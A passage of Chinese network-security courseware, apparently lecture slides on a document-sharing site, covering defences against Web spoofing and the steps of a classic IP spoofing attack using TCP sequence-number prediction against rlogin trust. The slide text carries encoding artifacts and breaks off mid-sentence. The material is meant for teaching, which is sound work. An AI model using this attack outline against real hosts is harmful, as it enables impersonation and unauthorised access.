3.必須知道Session變量以及它的限制條件2024/8/1487Web欺騙的防御防范Web欺騙的方法:配置網(wǎng)絡(luò)瀏覽器使它總能顯示目的URL,并且習(xí)慣查看它。檢查源代碼,如果發(fā)生了URL重定向,就一定會(huì)發(fā)現(xiàn)。不過,檢查用戶連接的每一個(gè)頁面的源代碼對(duì)普通用戶來說是不切實(shí)際的想法。使用反網(wǎng)絡(luò)釣魚軟件。禁用JavaScript、ActiveX或者任何其他在本地執(zhí)行的腳本語言。確保應(yīng)用有效和能適當(dāng)?shù)馗櫽脩?。無論是使用cookie還是會(huì)話ID,都應(yīng)該確保要盡可能的長和隨機(jī)。培養(yǎng)用戶注意瀏覽器地址線上顯示的URL的好習(xí)慣。培養(yǎng)用戶的安全意識(shí)和對(duì)開發(fā)人員的安全教育。Web欺騙攻擊Web欺騙的防護(hù)很隱蔽,不容易被發(fā)現(xiàn)預(yù)防手段禁止瀏覽器中的JavaScript功能確保瀏覽器的連接狀態(tài)是可見的時(shí)刻注意所點(diǎn)擊的URL鏈接會(huì)在位置狀態(tài)行中得到正確的顯示第7章第3節(jié)Ip欺騙2024/8/1490在Internet上計(jì)算機(jī)之間相互進(jìn)行的交流建立在兩個(gè)前提之下:認(rèn)證(Authentication)信任(Trust)2024/8/1491認(rèn)證:
認(rèn)證是網(wǎng)絡(luò)上的計(jì)算機(jī)用于相互間進(jìn)行識(shí)別的一種鑒別過程,經(jīng)過認(rèn)證的過程,獲準(zhǔn)相互交流的計(jì)算機(jī)之間就會(huì)建立起相互信任的關(guān)系。2024/8/1492信任:
信任和認(rèn)證具有逆反關(guān)系,即如果計(jì)算機(jī)之間存在高度的信任關(guān)系,則交流時(shí)就不會(huì)要求嚴(yán)格的認(rèn)證。而反之,如果計(jì)算機(jī)之間沒有很好的信任關(guān)系,則會(huì)進(jìn)行嚴(yán)格的認(rèn)證。2024/8/1493欺騙實(shí)質(zhì)上就是一種冒充身份通過認(rèn)證騙取信任的攻擊方式。攻擊者針對(duì)認(rèn)證機(jī)制的缺陷,將自己偽裝成可信任方,從而與受害者進(jìn)行交流,最終攫取信息或是展開進(jìn)一步攻擊。IP欺騙攻擊IP欺騙的基礎(chǔ)通過偽造IP地址能夠獲得更過的收益或者權(quán)限偽造的IP地址可以被接受而不被發(fā)現(xiàn)第7章第4節(jié)IP欺騙攻擊IP欺騙的過程信任SYNxSYNy+ACKx+1ACKy+1第7章第4節(jié)IP欺騙攻擊IP欺騙的過程首先使被信任主機(jī)的網(wǎng)絡(luò)暫時(shí)癱瘓連接到目標(biāo)機(jī)的某個(gè)端口來猜測(cè)ISN基值和增加規(guī)律
把源址址偽裝成被信任主機(jī),發(fā)送帶有SYN標(biāo)志的數(shù)據(jù)段請(qǐng)求連接等待目標(biāo)機(jī)發(fā)送SYN+ACK包給已經(jīng)癱瘓的主機(jī)再次偽裝成被信任主機(jī)向目標(biāo)機(jī)發(fā)送的ACK,此時(shí)發(fā)送的數(shù)據(jù)段帶有預(yù)測(cè)的目標(biāo)機(jī)的ISN+1連接建立,發(fā)送命令請(qǐng)求第7章第4節(jié)序列號(hào)猜測(cè)的重要性?
攻擊者X冒充受攻擊目標(biāo)A信任的對(duì)象B,遠(yuǎn)程連接A的rlogin端口,如果能連接成功,不再需要口令就能登錄A。?
因?yàn)锳對(duì)X請(qǐng)求的響應(yīng)包返回給B,X不可能知道其中A的序列號(hào),要想在圖
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 二零二五年度教育培訓(xùn)機(jī)構(gòu)招生合同模板4篇
- 2025年度出口貨物運(yùn)輸風(fēng)險(xiǎn)評(píng)估與處理合同4篇
- 2025年度交通樞紐建設(shè)承包經(jīng)營權(quán)合同匯編3篇
- 二零二五年洛陽文化展覽館租賃合同4篇
- 二零二五年度高端廚房櫥柜采購合同范本3篇
- 2025年度教育設(shè)施承包租賃合同3篇
- 二零二五年度馬賽克墻磚定制采購協(xié)議書3篇
- 二零二五版汽車銷售區(qū)域代理合作協(xié)議書4篇
- 二零二五版重型工業(yè)門制造及安裝工程承包協(xié)議4篇
- 2025年度小額信用貸款合同審批流程4篇
- 公司組織架構(gòu)圖(可編輯模版)
- 1汽輪機(jī)跳閘事故演練
- 陜西省銅川市各縣區(qū)鄉(xiāng)鎮(zhèn)行政村村莊村名居民村民委員會(huì)明細(xì)
- 禮品(禮金)上交登記臺(tái)賬
- 普通高中英語課程標(biāo)準(zhǔn)詞匯表
- 北師大版七年級(jí)數(shù)學(xué)上冊(cè)教案(全冊(cè)完整版)教學(xué)設(shè)計(jì)含教學(xué)反思
- 2023高中物理步步高大一輪 第五章 第1講 萬有引力定律及應(yīng)用
- 青少年軟件編程(Scratch)練習(xí)題及答案
- 浙江省公務(wù)員考試面試真題答案及解析精選
- 系統(tǒng)性紅斑狼瘡-第九版內(nèi)科學(xué)
- 全統(tǒng)定額工程量計(jì)算規(guī)則1994
評(píng)論
0/150
提交評(píng)論